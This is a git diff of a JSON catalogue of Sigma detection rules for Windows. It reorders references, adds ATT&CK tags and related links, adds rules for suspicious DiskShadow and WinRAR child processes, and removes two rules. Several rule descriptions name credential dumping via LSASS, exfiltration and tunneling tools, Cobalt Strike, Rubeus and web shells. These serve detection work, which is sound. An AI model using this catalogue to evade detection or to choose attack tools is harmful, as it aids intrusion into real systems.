- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", - "https://redcanary.com/blog/misbehaving-rats/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_remote_access_software_domains.yml" ], "tags": [ @@ -42697,9 +43235,9 @@ "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ + "https://www.virustotal.com/gui/file/0e2854753d17b1bb534de8e765d5813c9fb584a745978b3d92bc6ca78e3e7735/relations", "https://www.virustotal.com/gui/file/d5661009c461a8b20e1ad22f48609cc84dd90aee9182e026659dde4d46aaf25e/relations", "https://www.proofpoint.com/us/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-update", - "https://www.virustotal.com/gui/file/0e2854753d17b1bb534de8e765d5813c9fb584a745978b3d92bc6ca78e3e7735/relations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_malware_socgholish_second_stage_c2.yml" ], "tags": [ @@ -42800,11 +43338,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html", - "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/", "https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176", "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", + "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/", "https://redcanary.com/blog/raspberry-robin/", + "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html", "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml" ], @@ -42896,8 +43434,8 @@ "logsource.product": "windows", "refs": [ "http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/", - "http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/", + "http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml" ], "tags": [ @@ -43020,8 +43558,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20", + "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml" ], @@ -43089,9 +43627,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://redcanary.com/threat-detection-report/", "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", "https://www.cobaltstrike.com/help-windows-executable", - "https://redcanary.com/threat-detection-report/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" ], "tags": [ @@ -43205,11 +43743,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", "https://www.joeware.net/freetools/tools/adfind/", "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", - "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", "https://thedfirreport.com/2020/05/08/adfind-recon/", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_adfind.yml" ], @@ -43288,39 +43826,6 @@ "uuid": "e9142d84-fbe0-401d-ac50-3e519fb00c89", "value": "WhoAmI as Parameter" }, - { - "description": "Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.", - "meta": { - "author": "frack113", - "creation_date": "2021/12/26", - "falsepositive": [ - "Expected FP with some processes using this techniques to terminate one of their processes during installations and updates" - ], - "filename": "proc_creation_win_taskkill_execution.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1489/T1489.md#atomic-test-3---windows---stop-service-by-killing-process", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskkill_execution.yml" - ], - "tags": [ - "attack.impact", - "attack.t1489" - ] - }, - "related": [ - { - "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "86085955-ea48-42a2-9dd3-85d4c36b167d", - "value": "Suspicious Execution of Taskkill" - }, { "description": "Execution of well known tools for data exfiltration and tunneling", "meta": { @@ -43417,8 +43922,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml" ], "tags": [ @@ -43559,8 +44064,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/countuponsec/status/910969424215232518", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/", "https://twitter.com/countuponsec/status/910977826853068800", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml" ], "tags": [ @@ -43593,9 +44098,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regasm/", - "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/", "https://www.fortiguard.com/threat-signal-report/4718?s=09", + "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/", + "https://lolbas-project.github.io/lolbas/Binaries/Regasm/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regasm_suspicious_execution.yml" ], "tags": [ @@ -43661,8 +44166,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://h.43z.one/ipconverter/", "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", + "https://h.43z.one/ipconverter/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml" ], "tags": [ @@ -43835,8 +44340,20 @@ "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_sysaidserver_susp_child_process.yml" ], - "tags": "No established tags" + "tags": [ + "attack.lateral_movement", + "attack.t1210" + ] }, + "related": [ + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", "value": "Suspicious SysAidServer Child" }, @@ -43855,8 +44372,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", + "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_parent_anomaly.yml" ], @@ -43891,8 +44408,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/shantanu561993/SharpChisel", "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/", + "https://github.com/shantanu561993/SharpChisel", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharp_chisel.yml" ], "tags": [ @@ -43912,49 +44429,6 @@ "uuid": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", "value": "HackTool - SharpChisel Execution" }, - { - "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", - "meta": { - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", - "creation_date": "2021/11/27", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_lsass_clone.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", - "https://twitter.com/SBousseaden/status/1464566846594691073?s=20", - "https://twitter.com/Hexacorn/status/1420053502554951689", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.001" - ] - }, - "related": [ - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - }, - { - "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", - "value": "Potential Credential Dumping Via LSASS Process Clone" - }, { "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", "meta": { @@ -43968,8 +44442,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", + "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_susp_flags.yml" ], @@ -44024,6 +44498,45 @@ "uuid": "0a4f6091-223b-41f6-8743-f322ec84930b", "value": "Suspicious GUP Usage" }, + { + "description": "Detects potentially suspicious child processes of \"Diskshadow.exe\". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.", + "meta": { + "author": "Nasreddine Bencherchali (Nextron Systems)", + "creation_date": "2023/09/15", + "falsepositive": [ + "False postitve can occur in cases where admin scripts levreage the \"exec\" flag to execute applications" + ], + "filename": "proc_creation_win_diskshadow_child_process_susp.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware", + "https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/", + "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/", + "https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4", + "https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_diskshadow_child_process_susp.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "9f546b25-5f12-4c8d-8532-5893dcb1e4b8", + "value": "Potentially Suspicious Child Process Of DiskShadow.EXE" + }, { "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", "meta": { @@ -44038,11 +44551,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://ngrok.com/docs", - "https://www.softwaretestinghelp.com/how-to-use-ngrok/", - "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp", - "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", "https://twitter.com/xorJosh/status/1598646907802451969", + "https://www.softwaretestinghelp.com/how-to-use-ngrok/", + "https://ngrok.com/docs", + "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", + "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp", "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/", "https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_ngrok.yml" @@ -44146,13 +44659,13 @@ "logsource.product": "windows", "refs": [ "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters", - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", - "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", - "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html", "https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/", - "https://github.com/redcanaryco/atomic-red-team/blob/5360c9d9ffa3b25f6495f7a16e267b719eba2c37/atomics/T1482/T1482.md#atomic-test-2---windows---discover-domain-trusts-with-nltest", + "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html", "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://github.com/redcanaryco/atomic-red-team/blob/5360c9d9ffa3b25f6495f7a16e267b719eba2c37/atomics/T1482/T1482.md#atomic-test-2---windows---discover-domain-trusts-with-nltest", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_recon.yml" ], "tags": [ @@ -44193,8 +44706,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", "https://github.com/hfiref0x/UACME", + "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", "https://twitter.com/hFireF0X/status/897640081053364225", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp_com_object_access.yml" @@ -44278,8 +44791,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/nas_bench/status/1535431474429808642", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/", + "https://twitter.com/nas_bench/status/1535431474429808642", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml" ], "tags": [ @@ -44321,9 +44834,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://learn.microsoft.com/en-us/answers/questions/253555/software-list-inventory-wmic-product", "https://www.yeahhub.com/list-installed-programs-version-path-windows/", "https://thedfirreport.com/2023/03/06/2022-year-in-review/", - "https://learn.microsoft.com/en-us/answers/questions/253555/software-list-inventory-wmic-product", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_product.yml" ], "tags": [ @@ -44356,9 +44869,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://mez0.cc/posts/cobaltstrike-powershell-exec/", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", "https://redcanary.com/blog/yellow-cockatoo/", - "https://mez0.cc/posts/cobaltstrike-powershell-exec/", "https://zero2auto.com/2020/05/19/netwalker-re/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_xor_commandline.yml" ], @@ -44518,8 +45031,8 @@ "logsource.product": "windows", "refs": [ "https://www.joeware.net/freetools/tools/adfind/", - "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md", + "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration.yml" ], "tags": [ @@ -44552,8 +45065,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.pdq.com/pdq-deploy/", "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1072/T1072.md", + "https://www.pdq.com/pdq-deploy/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdqdeploy_execution.yml" ], "tags": [ @@ -44752,6 +45265,40 @@ "uuid": "327ff235-94eb-4f06-b9de-aaee571324be", "value": "Regsvr32 Execution From Highly Suspicious Location" }, + { + "description": "Detects potentially suspicious child processes of WinRAR.exe.", + "meta": { + "author": "Nasreddine Bencherchali (Nextron Systems)", + "creation_date": "2023/08/31", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_winrar_susp_child_process.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/", + "https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrar_susp_child_process.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203" + ] + }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "146aace8-9bd6-42ba-be7a-0070d8027b76", + "value": "Potentially Suspicious Child Process Of WinRAR.EXE" + }, { "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", "meta": { @@ -44820,16 +45367,16 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", - "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", - "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://bunnyinside.com/?term=f71e8cb9c76a", "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", "https://twitter.com/_xpn_/status/1268712093928378368", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml" ], "tags": [ @@ -44862,8 +45409,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/", "https://twitter.com/0gtweet/status/1457676633809330184", + "https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml" ], "tags": [ @@ -44896,9 +45443,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_schedule_type.yml" ], "tags": [ @@ -44933,8 +45480,8 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://www.poweradmin.com/paexec/", + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" ], "tags": [ @@ -45078,8 +45625,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/jonasLyk/status/1555914501802921984", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://twitter.com/jonasLyk/status/1555914501802921984", "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml" ], @@ -45330,8 +45877,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1628720819537936386", "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", + "https://twitter.com/0gtweet/status/1628720819537936386", "https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml" ], @@ -45400,8 +45947,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/", "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html", + "https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_detection.yml" ], "tags": [ @@ -45458,8 +46005,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20220830122045/http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html", "https://blog.talosintelligence.com/modernloader-delivers-multiple-stealers-cryptominers-and-rats/", + "https://web.archive.org/web/20220830122045/http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_inline_vbscript.yml" ], "tags": [ @@ -45567,8 +46114,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.autohotkey.com/download/", "https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/", + "https://www.autohotkey.com/download/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_autohotkey.yml" ], "tags": [ @@ -45591,9 +46138,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/", - "https://twitter.com/bryon_/status/975835709587075072", "https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15", + "https://twitter.com/bryon_/status/975835709587075072", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml" ], "tags": [ @@ -45766,14 +46313,44 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", "https://twitter.com/splinter_code/status/1483815103279603714", + "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advancedrun.yml" ], - "tags": "No established tags" + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1564.003", + "attack.t1134.002", + "attack.t1059.003" + ] }, + "related": [ + { + "dest-uuid": "cbb66055-0325-4111-aca0-40547b6ad5b0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d2b749ee-4225-417e-b20e-a8d2193cbb84", "value": "PUA - AdvancedRun Execution" }, @@ -45857,9 +46434,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", - "https://github.com/GhostPack/Rubeus", "https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus", + "https://github.com/GhostPack/Rubeus", + "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_rubeus.yml" ], "tags": [ @@ -45912,8 +46489,20 @@ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_decode_gzip.yml" ], - "tags": "No established tags" + "tags": [ + "attack.command_and_control", + "attack.t1132.001" + ] }, + "related": [ + { + "dest-uuid": "04fd5427-79c7-44ea-ae13-11b24778ff1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "98767d61-b2e8-4d71-b661-e36783ee24c1", "value": "Gzip Archive Decode Via PowerShell" }, @@ -45963,10 +46552,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/", - 